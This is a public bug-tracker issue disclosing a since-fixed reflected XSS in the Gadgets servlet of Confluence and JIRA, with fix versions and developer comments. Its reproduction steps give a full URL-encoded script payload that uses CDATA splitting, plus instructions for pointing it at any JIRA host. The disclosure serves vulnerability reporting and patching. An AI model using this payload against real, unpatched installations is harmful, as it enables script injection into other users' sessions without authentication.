[CONFSERVER-34248] Reflected XSS affecting Confluence via Gadgets

Type: Bug
Resolution: Fixed
Priority: High
Fix Version/s: 5.5.6, 5.5-OD-31
Affects Version/s: 5.5.3
Component/s: Macros - Gadgets
Labels:

CVSS Score:
7.5
Bug Fix Policy:
View Atlassian Server bug fix policy

Steps to recreate:

1. To view the reflected XSS affecting JIRA, present on the current JIRA installation (jira.atlassian.com) visit the following link:

https://jira.atlassian.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

2. To perform the reflected XSS attack on any JIRA installation (not sure how far this issue dates back to), replace the host (jira.atlassian.com, found on later in the URL) with the one you wish to test on, and append the path to the base JIRA directory.

/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

Note: This XSS requires no user interaction, or authentication.

The original reporter of this vulnerability is Nir Goldshlager ngoldshlager@salesforce.com.

is cloned from

JRACLOUD-66366 Reflected XSS affecting JIRA via Gadgets

Closed

Kenny MacLeod added a comment - 18/Jul/2014 4:11 AM

Gadgets 3.3.8 merged to release/5.5 and master

Kenny MacLeod added a comment - 18/Jul/2014 4:11 AM Gadgets 3.3.8 merged to release/5.5 and master

ShubhamA added a comment - 25/Jun/2014 6:16 AM

vosipov, I was able to confirm the XSS on the latest JIRA (version 6.3-OD-08-001). This also applies for ~~JRA-38884~~ (Remote DoS via XXE Injection).

ShubhamA added a comment - 25/Jun/2014 6:16 AM vosipov , I was able to confirm the XSS on the latest JIRA (version 6.3-OD-08-001). This also applies for JRA-38884 (Remote DoS via XXE Injection).

Assignee:: Kenny MacLeod

Reporter:: Steve Haffenden (Inactive)

Affected customers:: 0 This affects my team

Watchers:: 3 Start watching this issue

Created:: 14/Jul/2014 3:28 AM

Updated:: 11/Oct/2018 8:37 AM

Resolved:: 18/Jul/2014 4:11 AM

Details

Description

Attachments

Issue Links

Forms

Activity

Collapse comment: Kenny MacLeod added a comment - 18/Jul/2014 4:11 AM

Expand comment: Kenny MacLeod added a comment - 18/Jul/2014 4:11 AM

Collapse comment: ShubhamA added a comment - 25/Jun/2014 6:16 AM

Expand comment: ShubhamA added a comment - 25/Jun/2014 6:16 AM

People

Dates